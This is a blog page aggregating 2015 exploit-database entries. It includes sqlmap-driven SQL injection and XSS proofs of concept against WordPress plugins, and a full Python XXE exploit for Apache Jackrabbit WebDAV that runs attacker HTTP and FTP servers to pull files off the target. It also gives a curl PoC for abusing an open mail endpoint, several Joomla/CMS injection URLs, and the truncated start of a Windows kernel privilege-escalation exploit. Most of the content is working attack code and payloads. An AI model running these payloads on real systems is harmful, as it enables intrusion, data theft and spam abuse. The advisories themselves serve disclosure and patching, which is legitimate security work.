# Title: SQLi vulnerabilities in WordPress plugin "GigPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/gigpress/
# Active installs: 20,000+
# Vulnerable version: 2.3.8
# Fixed version: 2.3.9
# CVE: CVE-2015-4066
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
admin/handlers.php:87
+++++++++++++++++++++++++++++++++++++++++
$show['show_tour_id'] = $_POST['show_tour_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:94
+++++++++++++++++++++++++++++++++++++++++
$artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . "");
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql
[............]
POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_artist_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new
---
[12:21:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
admin/handlers.php:71
+++++++++++++++++++++++++++++++++++++++++
$show['show_venue_id'] = $_POST['show_venue_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:95
+++++++++++++++++++++++++++++++++++++++++
$venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A);
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql
[............]
POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_venue_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new
---
[12:23:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++
Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response and fix.
2015-05-25: Public disclosure.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863153223
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
"""
# Exploit Title: Jackrabbit WebDAV XXE
# Date: 25-05-2015
# Software Link: http://jackrabbit.apache.org/jcr/
# Exploit Author: Mikhail Egorov
# Contact: 0ang3el () gmail com
# Website: http://0ang3el.blogspot.com
# CVE: CVE-2015-1833
# Category: webapps
1. Description
Jackrabbit WebDAV plugin use insecurely configured XML parser to parse
incoming PROPPATCH and PROPFIND requests. As a result it is vulnerable to
XXE attacks.
Besides Jackrabbit JCR, WebDAV plugin is incorporated into the following
software: Apache Sling, Adobe AEM.
2. Proof of Concept
Download vulnerable Apache Sling launchpad web application from here -
https://sling.apache.org
Start launchpad web application as follows:
root@kali:~/build-sling# java -jar
org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar
Launch exploit with the following command:
root@kali:~# python cve-2015-1833.py --url http://127.0.0.1:8080/content/xxe
--tech oob --ip 127.0.0.1
enter command> get .
loaded 210 bytes in buffer
enter command> show
apache-maven-3.0.5
apache-maven-3.0.5-bin.tar.gz
derby.log
eclipse
hs_err_pid5379.log
org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar
python-workspace
enter command> store /tmp/cwd.lst
buffer content has been stored in file /tmp/cwd.lst
enter command> exit
root@kali:~#
Exploit have three exploitation techniques:
* inb1 - inbound XXE technique, it first writes content as attribute value
of controllable JCR node using PROPPATCH request and then retrieves content
using PROPFIND request
* inb2 - same as inb1, but there is some XML magic to retrieve content that
is not valid XML data
* oob - out-of-bound technique, utilizes FTP hack from this blog
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Technique inb2 is the most stable. But it requires credentials of the user
that is able to modify some JCR node. Attacker host must have "visible ip"
which is required for communication between target and attacker's host.
Technique oob works even with anonymous credentials. But it is not so
stable as inb2 technique.
Technique inb1 does not require "visible ip", but there are limitations on
retrieved content.
3. Solution:
If you use Apache Jackrabbit, install version 2.10.1.
http://www.apache.org/dist/jackrabbit/2.10.1/RELEASE-NOTES.txt
"""
from urllib2 import *
import sys, string, random
import base64
import xml.etree.ElementTree as ET
import BaseHTTPServer, SimpleHTTPServer
from multiprocessing import Process, Value, Manager
from optparse import OptionParser
import socket, select
usage= """
%prog --url <url> --tech inb1 [ --creds <creds> ]
%prog --url <url> --tech inb2 --ip <ip> [ --creds <creds> --hport <hport> ]
%prog --url <url> --tech oob --ip <ip> [ --creds <creds> --hport <hport> --fport <fport>]
"""
help_interpreter = """
help - print this help.
get <dir or file> - retrieve directory listing or file content and store it inside internal buffer. You can use "." to denote current directory (e.g. use "get ." for cwd listing).
show - show content of internal buffer.
store <out file> - store internal buffer in file.
exit - stop exploiting
"""
failure_descr = """
Possible reasons:
1. Inappropriate technique, try another options.
2. You do not have permissions to read file or list directory.
3. Target is not exploitable.
"""
rand_attr = ''
script_name = sys.argv[0].split('/')[-1]
buffer_with_loot = ''
url, tech, ip, creds, hport, fport = [None] * 6
http_server, ftp_server = [None] * 2
class HTTP_XXE():
def __init__(self, ip, port, fport):
self.port = port
self.ip = ip
self.fport = fport
def run(self):
class http_handler(BaseHTTPServer.BaseHTTPRequestHandler):
def __init__(self, ip, fport,*args):
self.ip = ip
self.fport = fport
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args)
def do_GET(self):
if "inb2" in self.path:
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY all "%start;%loot;%end;">')
if "oob" in self.path:
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY %% all "<!ENTITY % send SYSTEM "ftp://%(ip)s:%(port)s/%%loot;">">%%all;' % {'ip' : self.ip, 'port' : self.fport})
def log_message(self, format, *args): # silent HTTP server
return
def serve(httpd):
while True:
httpd.handle_request()
handler = lambda *args: http_handler(self.ip, self.fport, *args)
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', self.port), handler)
self.proc = Process(target = serve, args = (httpd,))
self.proc.start()
def stop(self):
self.proc.terminate()
class FTP_XXE():
def __init__(self, port):
self.port = port
def run(self):
class ftp_handler():
def __init__(self, port):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.setblocking(0)
self.server.bind(('0.0.0.0', port))
self.server.listen(5)
def serve(self, d):
inputs = [self.server]
while True:
readable, writable, exceptional = select.select(inputs, [], [])
for s in readable:
if s is self.server:
connection, client_address = s.accept()
connection.setblocking(0)
inputs.append(connection)
connection.send("220 xxe-ftp-server\n")
else:
data = s.recv(1024)
if not data:
inputs.remove(s)
continue
if "USER" in data:
s.send("331 password please - version check\n")
else:
s.send("230 more data please!\n")
if not len([x for x in ["PASS","EPSV","EPRT","TYPE"] if x in data]):
d['loot'] += data
self.d = Manager().dict()
self.d['loot'] = ''
ftpd = ftp_handler(self.port)
self.proc = Process(target = ftpd.serve, args=(self.d,))
self.proc.start()
def stop(self):
self.proc.terminate()
def clean_buf(self):
self.d['loot'] = ''
def get_loot(self):
loot = self.d['loot']
# clean data
loot = loot.replace('\r\nRETR ','/')
loot = loot.replace('\r\nCWD ','/')
loot = loot.replace('CWD ','',1)
loot = loot.replace('RETR ','',1)
return loot
def exploit(url, technique, creds = 'anonymous:anonymous'):
global buffer_with_loot, rand_attr
requests = {
'inb1' : {
'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY loot SYSTEM "%(file)s"> ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&loot;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>',
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
},
'inb2' : {
'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY %% start "<![CDATA["> <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% end "]]>"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/inb2"> %%dtd; ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&all;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>',
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
},
'oob' : {
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE propfind [ <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/oob"> %%dtd; %%send; ]> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
}
}
def request(url, verb, data, creds, timeout):
req = Request(url, data)
req.add_header('User-Agent', script_name)
req.add_header('Content-Type', 'application/xml')
req.add_header('Authorization', 'Basic ' + base64.b64encode(creds))
req.get_method = lambda: verb
#req.set_proxy('127.0.0.1:8081','http') ### For debug
resp = None
try:
resp = urlopen(req, timeout = timeout).read()
except Exception, e:
pass
return resp
while 1:
cmdline = raw_input('\033[33menter command> \033[0m')
cmdline = re.sub('\s+', ' ', cmdline)
cmd = cmdline.split(' ')[0]
arg = cmdline.split(' ')[-1]
if cmd not in ['help', 'get', 'show', 'store', 'exit']:
print '\n\033[36mno such command, use help for command list \033[0m\n'
continue
if cmd == 'exit':
break
if cmd == 'help':
print '\033[36m' + help_interpreter + '\033[0m'
continue
if cmd == 'show':
print '\n\033[36m' + buffer_with_loot + '\033[0m'
continue
if cmd == 'store':
with open(arg,'w') as outf:
outf.write(buffer_with_loot)
print '\n\033[32mbuffer content has been stored in file ' + arg + '\033[0m\n'
continue
if cmd == 'get':
if arg.startswith('.'):
arg = '/proc/self/cwd' + arg[1:]
arg = 'file://' + arg
rand_attr = ''.join([random.choice(string.ascii_lowercase) for i in range(10)]) ### random attribute name where we place content
if technique == 'inb1':
request1 = requests['inb1']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg}
request(url, 'PROPPATCH', request1, creds, timeout = 30)
request2 = requests['inb1']['PROPFIND']
loot = request(url, 'PROPFIND', request2, creds, timeout = 30)
try:
buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text
except:
buffer_with_loot = ''
if technique == 'inb2':
request1 = requests['inb2']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg, 'ip' : ip, 'port' : hport}
request(url, 'PROPPATCH', request1, creds, timeout = 30)
request2 = requests['inb2']['PROPFIND']
loot = request(url, 'PROPFIND', request2, creds, timeout = 30)
try:
buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text.replace('<[CDATA[','').replace(']]>','')
except:
buffer_with_loot = ''
if technique == 'oob':
request1 = requests['oob']['PROPFIND'] % {'file' : arg, 'ip' : ip, 'port' : hport}
request(url, 'PROPFIND', request1, creds, timeout = 8)
buffer_with_loot = ftp_server.get_loot()
ftp_server.clean_buf()
len_ = sys.getsizeof(buffer_with_loot) - sys.getsizeof('')
print "\n\033[32mloaded %s bytes in buffer\033[0m\n" % len_
if not len_:
print '\033[36m' + failure_descr + '\033[0m'
continue
def parse_options():
global url, tech, ip, creds, hport, fport
parser = OptionParser(usage = usage)
parser.add_option('--url', dest = url, help = 'url parameter')
parser.add_option('--tech', dest = tech, help = 'technique, valid values are: inb1, inb2, oob')
parser.add_option('--creds', dest = creds, help = 'user credentials, default value is anonymous:anonymous')
parser.add_option('--ip', dest = ip, help = 'ip address of netw interface that your target is able to access')
parser.add_option('--hport', dest = hport, help = 'port for HTTP server which will be launched during attack, default is 9998')
parser.add_option('--fport', dest = fport, help = 'port for FTP server which will be launched during attack, default is 9999')
(options, args) = parser.parse_args()
if not options.url or not options.tech:
print 'you must specify url and tech parameters'
sys.exit(2)
if options.tech not in ['inb1', 'inb2', 'oob']:
print 'invalid tech parameter'
sys.exit(2)
if options.tech != 'inb1' and not options.ip:
print 'you must specify ip parameter'
sys.exit(2)
url = options.url
tech = options.tech
ip = options.ip
creds = options.creds if options.creds else 'anonymous:anonymous'
hport = options.hport if options.hport else 9998
fport = options.fport if options.fport else 9999
parse_options()
if tech != 'inb1':
http_server = HTTP_XXE(ip, hport, fport)
http_server.run()
if tech == 'oob':
ftp_server = FTP_XXE(fport)
ftp_server.run()
exploit(url, tech, creds)
if tech != 'inb1':
http_server.stop()
if tech == 'oob':
ftp_server.stop()
# Title: Multiple vulnerabilities in WordPress plugin "WordPress Landing Pages"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/landing-pages/
# Active installs: 20,000+
# Vulnerable version: 1.8.4
# Fixed version: 1.8.5
# CVE: CVE-2015-4064, CVE-2015-4065
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89] (CVE-2015-4064)
-----------------------------------------------
* CODE:
modules/module.ab-testing.php:100
+++++++++++++++++++++++++++++++++++++++++
$wpdb->query("
SELECT `meta_key`, `meta_value`
FROM $wpdb->postmeta
WHERE `post_id` = ".$_GET['post']."
");
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/post.php?post=306[SQLi]&action=edit&lp-variation-id=1&ab-action=delete-variation
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/post.php?post=306&action=edit&lp-variation-id=0&ab-action=delete-variation" -p post
[............]
GET parameter 'post' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Parameter: post (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: post=306 AND (SELECT * FROM (SELECT(SLEEP(10)))sCKL)&action=edit&lp-variation-id=0&ab-action=delete-variation
---
[13:35:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated XSS [CWE-79] (CVE-2015-4065)
----------------------------------------------
* CODE:
shared/shortcodes/inbound-shortcodes.php:761
+++++++++++++++++++++++++++++++++++++++++
<iframe src='<?php echo INBOUDNOW_SHARED_URLPATH . 'shortcodes/'; ?>preview.php?sc=&post=<?php echo $_GET['post']; ?>' width="285" scrollbar='true' frameborder="0" id="inbound-shortcodes-preview"></iframe>
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/post-new.php?post_type=inbound-forms&post='></iframe><script>alert(String.fromCharCode(88, 83, 83))</script>
Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response.
2015-05-22: Vendor fix.
2015-05-25: Public disclosure.
# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
$where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
}
}
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------
includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.
######################
# Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page
# Exploit Author : Claudio Viviani
# Website Author: http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
# Dork Google: index of "contus-video-gallery"
# Date : 2015-04-05
# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox
######################
# Description
Wordpress Video Gallery 2.8 suffers from Unprotected Mail Page.
This vulnerability is exploitable to dos, phishing, mailbombing, spam...
The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php)
/**
* Email function
*/
add_action( 'wp_ajax_email', 'email_function' );
add_action( 'wp_ajax_nopriv_email', 'email_function' );
function email_function() {
require_once( dirname( __FILE__ ) . '/email.php' );
die();
}
Any user can send email from /contus-video-gallery/email.php to any recipients.
The variables used to send emails are:
$to = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
$from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
$url = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
$subject = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
$message_content = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
$title = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );
$referrer = parse_url( $_SERVER['HTTP_REFERER'] );
$referrer_host = $referrer['scheme'] . '://' . $referrer['host'];
$pageURL = 'http';
It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email:
if ( $referrer_host === $pageURL ) {
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
$headers .= "From: " . "<" . $from . ">\r\n";
$headers .= "Reply-To: " . $from . "\r\n";
$headers .= "Return-path: " . $from;
$username = explode('@' , $from );
$username = ucfirst($username['0']);
$subject = $username . ' has shared a video with you.';
$emailtemplate_path = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html';
$message = file_get_contents( $emailtemplate_path);
$message = str_replace( '{subject}', $subject, $message );
$message = str_replace( '{message}', $message_content, $message);
$message = str_replace( '{videourl}',$url,$message );
$message = str_replace('{username}',$username ,$message );
if ( @mail( $to, $title, $message, $headers ) ) {
echo 'success=sent';
} else {
echo 'success=error';
}
} else {
echo 'success=error';
}
The “Referer” field can easily be modified by the attacker!
######################
# PoC
curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
-e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email
cUrl switch "-e" spoof referer address
# Http Response
success=sent
# Poc Video
http://youtu.be/qgOGPm1-tNc
#######################
Discovered By : Claudio Viviani
http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
source: https://www.securityfocus.com/bid/53269/info
gpEasy is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
gpEasy 2.3.3 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/Admin_Preferences?gpreq=json&jsoncallback=<h1>test<br>test2<%2fh1>
source: https://www.securityfocus.com/bid/53273/info
Quick.CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Quick.CMS 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/admin/?p=[xss]
source: https://www.securityfocus.com/bid/53268/info
concrete5 is prone to information-disclosure, SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to harvest sensitive information, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
concrete5 5.5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata
http://www.example.com/concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form
source: https://www.securityfocus.com/bid/53237/info
The Video Gallery component for Joomla! is prone to local file-include and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the affected application. Information harvested may aid in further attacks.
The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control.
http://www.example.com/index.php?option=com_videogallery&Itemid=68'
http://www.example.com/index.php?option=com_videogallery&Itemid=[id]' [ SQLi Here ]--
http://www.example.com/&controller=../../../../../../../../../../../../[LFT]%00
source: https://www.securityfocus.com/bid/53208/info
The CCNewsLetter module for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CCNewsLetter 1.0.7 is vulnerable; prior versions may also be affected.
http://www.example.com/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
source: https://www.securityfocus.com/bid/53202/info
Waylu CMS is prone to an SQL-injection vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.
HTML Injection
http://www.example.com/WebApps/products_xx.php?id=[XSS]
SQL Injection
http://www.example.com/WebApps/products_xx.php?id=[SQL Injection]
// ex.cpp
/*
Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP
CVE-2015-0003
March 2015 (Public Release: May 24, 2015)
Tested on:
x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3
x64: Win 2k8 SP1 | Win 2k8 R2 SP1
Author: Skylake - skylake <at> mail <dot> com
*/
#include "ex.h"
_ZwAllocateVirtualMemory ZwAllocateVirtualMemory;
_PsLookupProcessByProcessId PsLookupProcessByProcessId;
_PsReferencePrimaryToken PsReferencePrimaryToken;
DWORD Pid;
ATOM atom;
BOOL KrnlMode, bSpawned;
DWORD_PTR WINAPI pti()
{
#ifdef _M_X64
LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );
return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );
#else
LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );
return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );
#endif
}
BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize )
{
DWORD_PTR dwIndex, dwMask;
#ifdef _M_X64
dwMask = ~0xf;
#else
dwMask = ~7;
#endif
//
dwCurrentValue &= dwMask;
for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ )
{
if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue )
{
//
pdwStructure[dwIndex] = dwNewValue;
return TRUE;
}
}
return FALSE;
}
BOOL WINAPI Init()
{
HMODULE hMod = NULL;
PVOID Base = NULL;
OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) };
PSYSTEM_MODULE_INFORMATION pm = NULL;
BOOL RetVal = FALSE;
__try {
if( !GetVersionEx( &ov ) ) __leave;
if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 )
{
atom = 0xc039;
}
